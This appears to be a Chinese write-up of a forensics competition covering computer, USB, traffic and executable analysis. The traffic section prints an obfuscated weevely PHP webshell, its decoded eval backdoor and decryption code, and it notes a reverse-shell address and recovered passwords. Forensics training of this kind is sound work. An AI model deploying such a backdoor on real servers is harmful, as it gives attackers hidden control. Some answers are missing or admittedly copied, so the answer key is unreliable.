数据取证
计算机取证
1:计算机取证-1
对计算机镜像进行分析,计算该镜像中 ESP 分区的 SM3 值后 8 位为?(答案格式:大写字母与数字组合,如:D23DDF44)
取出后8位BDBE1073
计算机取证-2
对计算机镜像进行分析,该操作系统超管账户最后一次注销时间为?(时区为 UTC+08:00)(答案格式如:1970-01-01 00:00:00)
计算机取证-3
对计算机镜像进行分析,该操作系统超管账户有记录的登录次数为?(填写数字,答案格式如:1234)
计算机取证-4
对计算机镜像进行分析,该操作系统设置的账户密码最长存留期为多少天?(填写数字,答案格式如:1234)
https://jingyan.baidu.com/article/a3f121e4be5b7fbd9152bb05.html
计算机取证-5
对计算机镜像进行分析,该操作系统安装的数据擦除软件的版本为?(答案格式:1.23)
计算机取证-7
对计算机镜像进行分析,该操作系统无线网卡分配的默认网关地址为?(答案格式:127.0.0.1)
计算机取证-8
对计算机镜像进行分析,该操作系统配置的连接 NAS 共享文件夹的 IP 地址为?(答案格式:127.0.0.1)
计算机取证-9
对计算机镜像进行分析,写出 “吵群技巧.txt” 文件 SM3 值的后 8 位?(大写字母与数字组合,如:D23DDF44)
可以从出题人的角度寻找文件:在仿真的电脑里输入win加R,再输入recent去查看最近的文件,对日期进行排序后筛选西出可疑文件—— 话术、方法、技巧.zip
然后找到导出解压计算哈希
这里有个工具可以用
AE用大写
计算机取证-10
对计算机镜像进行分析,该操作系统通过 SSH 连接工具连接 CCTalk 测试环境的 SSH 端口为?(填写数字,答案格式如:1234)
计算机取证-11
对计算机镜像进行分析,该操作系统通过 SSH 连接工具连接的 CCTalk 境外服务器是哪个运营商的?(填写汉字,答案格式:阿里云)
回收站还原cctalk
双击打开
工具查这个ip
亚马逊
计算机取证-12
对计算机镜像进行分析,获取机主保存在本机的 U 盾序号的后 4 位数字为?(填写数字,答案格式如:1234)
搜索U盾,发现一个图片,应该是misc图片隐写,直接拖到kali进行binwalk分离
binwalk U盾.jpeg
foremost U盾.jpeg -o ./output
┌──(root㉿kali)-[~/Desktop]
└─# ls
output U盾.jpeg
┌──(root㉿kali)-[~/Desktop]
└─# cd output
┌──(root㉿kali)-[~/Desktop/output]
└─# ls
audit.txt jpg png rar
┌──(root㉿kali)-[~/Desktop/output]
└─# cd rar
┌──(root㉿kali)-[~/Desktop/output/rar]
└─# ls
00000351.rar
计算机取证-13
对计算机镜像进行分析,机主存储的某篇新闻报道 “小程序搅动资源争夺战” 的发表年份为?(答案格式:2024)
直接百度搜就行2019
计算机取证-14
对计算机镜像进行分析,该操作系统访问 “环球商贸” 的 IP 地址为?(答案格式:127.0.0.1)
39.108.126.128
计算机取证-15
对计算机镜像进行分析,“环球商贸” 服务器配置的登录密码为?(答案按照实际填写,字母存在大小写)
时间排序可以看到使用了Finalshell连接
文件搜索finalshell路径
定位json文件
找到这个json
https://antontwelve.github.io/finalshellPasswordDecrypter/
这个工具可以对json文件解密
HQSM#20231108@gwWeB
计算机取证-16
对计算机镜像进行分析,机主安装的 PC-Server 服务环境的登录密码是?(答案按照实际填写,字母全小写)
计算机取证-17
对计算机镜像进行分析,机主搭建的宝塔面板的安全入口为?(答案格式:/abc123)
/c38b336a
计算机取证-18
对计算机镜像进行分析,机主搭建的宝塔面板的登录账号为?(答案格式:abcd)
这个里面的一个内嵌镜像,可以直接分析
计算机取证-19
对计算机镜像进行分析,其搭建的宝塔面板的登录密码为?(按实际值填写)
这里只能去搜索pagefile.sys
分析这个文件
然后010打开分析
我试着搜了,但是没有搜到,照抄别人的wp
密码:jlb1998
计算机取证-20
对计算机镜像进行分析,机主搭建的宝塔环境中绑定的宝塔账号是?(按实际值填写)
计算机取证-21
对计算机镜像进行分析,机主搭建的宝塔面板中 Mysql 环境的 root 密码为?(按实际值填写)
计算机取证-22
对计算机镜像进行分析,机主搭建的宝塔面板中 Mysql 环境连接的端口号为?(填写数字,答案格式如:1234)
计算机取证-23
接上题,“卡号分组” 表所在的数据库名为?(答案按照实际填写,字母全小写)
计算机取证-24
接上题,“孙华锦” 在 2020-07-01 10:49:07 时间节点的交易余额为?(答案格式:1234.56)
这里可以直接服务器连接mysql
mysql -uroot -p123456
show databases;
use a_train2023;
show tables;
SHOW FULL COLUMNS FROM 资金总表;
select * from 资金总表 where 交易户名 = '孙华锦' and
交易时间 = '2020-07-01 10:49:07';
u盘取证
计算机取证-25
对 U 盘镜像进行分析,其镜像中共有几个分区?(填写数字,答案格式如:1234)
用X-Way打开
可以看到有两个分区
计算机取证-26
对 U 盘镜像进行分析,其中 FAT32 主分区的 FAT 表数量有几个?(请使用十进制数方式填写答案,答案格式:1234)
R-Studio打开镜像,查看fat拷贝数
1
计算机取证-27
对 U 盘镜像进行分析,其中 FAT32 主分区定义的每扇区字节数为?(请使用十进制数方式填写答案,答案格式:1234)
4kb是8个扇区,所以1KB就是2个扇区,1kb=1024个字节
所以512字节就是1个扇区
所以是512
计算机取证-28
对 U 盘镜像进行分析,其中 FAT32 主分区的文件系统前保留扇区数为?(请使用十进制数方式填写答案,答案格式:1234)
计算方法:保留扇区=fat扇区位置-起始扇区位置
起始扇区位置(2048)
fat扇区位置(9393)
搜索fat分区的头——F8FFFF
搜索——十六进制数值——输入F8FFFF
所以得出7345
计算机取证-29
对 U 盘镜像进行分析,其中 FAT32 主分区的 FAT1 表相对于整个磁盘的起始扇区数为?(请使用十进制数方式填写答案,答案格式:1234)
相对于整个磁盘应该是9393,相对于分区应该是7345
结合上题
计算机取证-30
对 U 盘镜像进行分析,其中 NTFS 逻辑分区的 $MFT 起始簇号为?(请使用十进制数方式填写答案,答案格式:1234)
八个扇区=一个簇
也就是312656/8=39082
计算机取证-31
对 U 盘镜像进行分析,其中 NTFS 逻辑分区的簇大小为多少个扇区?(请使用十进制数方式填写答案,答案格式:1234)
8
计算机取证-32
U 盘镜像进行分析,请从该镜像的两个分区中找出使用 “新建文本文档.txt” 记录的同一个 MD5 值的两部分信息,并写出该 MD5 值的第 13–20 位字符串。(答案格式:小写字母与数字组合,如:d23ddf44)
使用Diskgenius pro
加载虚拟磁盘映像:
-
打开 DiskGenius Pro。
-
点击顶部菜单栏中的
磁盘->打开虚拟磁盘文件... -
‘查看’选项选择所有文件类型,加载.dd文件
-
恢复文件,选中所有类型
找到文件头损坏的两个图片
导出后010恢复即可——FF D8 FF E1
拼接得出md5
1b31d0139c8dd668aee24fa0a716dffe
取出13到28位的字符d668aee2
手机取证
手机取证-1
对手机镜像进行分析,机主微信 ID 号为?(答案按照实际填写,字母全小写)
网络流量分析
网络流量分析-1
分析网络流量包检材,写出抓取该流量包时所花费的秒数?(填写数字,答案格式:10)
网络流量分析-2
分析网络流量包检材,抓取该流量包时使用计算机操作系统的 build 版本是多少?(答案格式:10D32)
网络流量分析-3
分析网络流量包检材,受害者的 IP 地址是?(答案格式:192.168.1.1)
统计-> 端点
就这主要排查这;两个
筛选——http && ((ip.src == 192.168.75.132 && ip.dst == 192.168.75.131) || (ip.src == 192.168.75.131 && ip.dst == 192.168.75.132))
可以看到返回状态码131,132是get路劲,一直是扫描,所以131是服务器
192.168.75.131
网络流量分析-4
分析网络流量包检材,受害者所使用的操作系统是?(小写字母,答案格式:biwu)
随便找一个状态码返回包,在hypertext里面找
得出server是ubuntu
网络流量分析-5
分析网络流量包检材,攻击者使用的端口扫描工具是?(小写字母,答案格式:abc)
ua头
nmap
网络流量分析-6
分析网络流量包检材,攻击者使用的漏洞检测工具的版本号是?(答案格式:1.1.1)
一样是看ua
网络流量分析-7
分析网络流量包检材,攻击者通过目录扫描得到的 phpliteadmin 登录点是?(答案格式:/abc/abc.php)
可以设置筛选条件——http && ip.src == 192.168.75.132 && ip.dst == 192.168.75.131 && !(http.response.code == 404)
登录点要提交数据,方法为POST,即可找到
网络流量分析-8
分析网络流量包检材,攻击者成功登录到 phpliteadmin 时使用的密码是?(答案格式:按实际值填写)
http && ((ip.src == 192.168.75.132 && ip.dst == 192.168.75.131) || (ip.src == 192.168.75.131 && ip.dst == 192.168.75.132))
几个POST后变GET了,说明登录成功
网络流量分析-9
分析网络流量包检材,攻击者创建的 phpinfo 页面文件名是?(答案格式:abc.txt)
追踪tcp流,可以看到
直接就能看
网络流量分析-10
分析网络流量包检材,攻击者利用服务器漏洞从攻击机上下载的 payload 文件名是?(答案格式:abc.txt)
抓取一下
追踪流
这里是txt,但是是一个php
rev.txt
网络流量分析-11
分析网络流量包检材,攻击者反弹 shell 的地址及端口是?(答案格式:192.168.1.1:1234)
代码里面有
192.168.75.132:30127
网络流量分析-12
分析网络流量包检材,攻击者电脑所使用的 Python 版本号是?(答案格式:1.1.1)
3.11.8
网络流量分析-13
分析网络流量包检材,受害者服务器中网站所使用的框架结构是?(答案格式:thinkphp)
追踪下一个数据流,得出执行的命令可以看到是wp
网络流量分析-14
分析网络流量包检材,攻击者获取到的数据库密码是?(答案格式:大小写按实际值填写)
网络流量分析-15
分析网络流量包检材,攻击者上传了一个 weevely 木马进行权限维持,上传时所使用的端口号是?(答案格式:3306)
2000
网络流量分析-16
分析网络流量包检材,攻击者上传了一个 weevely 木马进行权限维持,该木马第一次执行时获取到的缓冲区内容是?(答案格式:按实际值填写)
可以向后分析
3269
这里是一个木马文件,交给ai分析
<?php
$q='uv1o2g6mkn7y";fv1unctiv1ov1n x(v1$t,$k){$c=v1strlen(v1$k)v1;v1$l=strlenv1($t);$o';
$k='tents(v1"php://iv1nput"),$v1mv1)==1) {@ov1b_start();v1@ev1val(@v1gzuncomv1press(@x(@';
$A='$k="c6v1ae1ev170";$khv1="cbbf9v1691e009";v1$v1kv1f="85a8v19e92c410";$p="dv1zINv1Rg';
$o='="v1";forv1($i=0;$v1iv1v1<$l;){fv1v1or($j=0;($j<$c&&$i<$lv1);$j++,$i++)v1{v1$o.=v1$t{$i}^';
$D=str_replace('cM','','cMcreacMte_cMfcMunccMcMtion');
$Q='$k{$j}v1v1;}}return v1$o;v1}if (@pregv1_v1match("/v1$kh(.+)v1v1$kf/",@v1fv1ile_get_cov1n';
$Z='leanv1();$r=@base6v14_ev1ncv1ode(v1@x(@gzcov1mpress($ov1),$v1kv1));printv1("$p$kh$r$kf");}';
$w='v1basev164_decodev1($mv1[v11]),$v1k)));$o=@ov1b_get_contev1nts(v1v1);@ob_env1d_c';
$S=str_replace('v1','',$A.$q.$o.$Q.$k.$w.$Z);
$C=$D('',$S);$C();
?>
代码混淆
ai分析后
$k="c6ae1e70";
$kh="cbbf9691e009";
$kf="85a89e92c410";
$p="dzINRguo2g6mkn7y";
function x($t,$k){
$c=strlen($k);
$l=strlen($t);
$o="";
for($i=0;$i<$l;){
for($j=0;($j<$c&&$i<$l);$j++,$i++){
$o.=$t{$i}^$k{$j};
}
}
return $o;
}
if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {
@ob_start();
@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));
$o=@ob_get_contents();
@ob_end_clean();
$r=@base64_encode(@x(@gzcompress($o),$k));
print("$p$kh$r$kf");
}
流量包里面找和参数相关的流
直接分析数据流
POST /help.php HTTP/1.1
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Host: 192.168.75.131
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Connection: close
}HWf-=PXe:{?M .cbbf9691e009G6oqKP+t4ABWAVLT4dExMHs6Ylw85a89e92c410f_OUraaYXp_&IVH4HTTP/1.1 200 OK
Date: Wed, 31 Jul 2024 15:07:54 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.26
Vary: Accept-Encoding
Content-Length: 60
Connection: close
Content-Type: text/html
dzINRguo2g6mkn7ycbbf9691e009G6pSUAZWgTBjNUtkPw==85a89e92c410
直接给ai
这里ai给我直接写出了一个php解密代码
<?php
$k = "c6ae1e70";
$encrypted = base64_decode("G6oqKP+t4ABWAVLT4dExMHs6Ylw");
function x($t, $k) {
$c = strlen($k);
$l = strlen($t);
$o = "";
for($i = 0; $i < $l;) {
for($j = 0; ($j < $c && $i < $l); $j++, $i++) {
$o .= $t[$i] ^ $k[$j];
}
}
return $o;
}
// 解密请求
$decrypted_request = gzuncompress(x($encrypted, $k));
echo "执行的命令: " . $decrypted_request . "\n";
// 解密响应
$encrypted_response = base64_decode("G6pSUAZWgTBjNUtkPw==");
$decrypted_response = gzuncompress(x($encrypted_response, $k));
echo "执行结果: " . $decrypted_response . "\n";
?>
57638
程序功能分析
程序功能分析-1
对exe程序检材进行分析,计算程序的MD5(128bit)校验值的最后八位是?(答案格式:大写字母与数字组合,如:D23DDF44)
https://www.iamwawa.cn/daxiaoxie.html
3CDD7939
程序功能分析-2
对exe程序检材进行分析,找出其释放的可执行程序的路径?(答案格式:D:\Document\Aaaa)
程序功能分析-3
对exe程序检材进行分析,找出其启动释放的可执行程序时命令的最后一个参数是什么?(答案格式:按实际值填写)
8.8.8.8
程序功能分析-4
对exe程序检材进行分析,该程序在执行时,会解密并写入一段字节码到Chakra模块的一个特定导出函数的内存地址中,以此来伪装调用的目的,请给出这个导出函数的名称?(答案格式:按实际函数名称填写)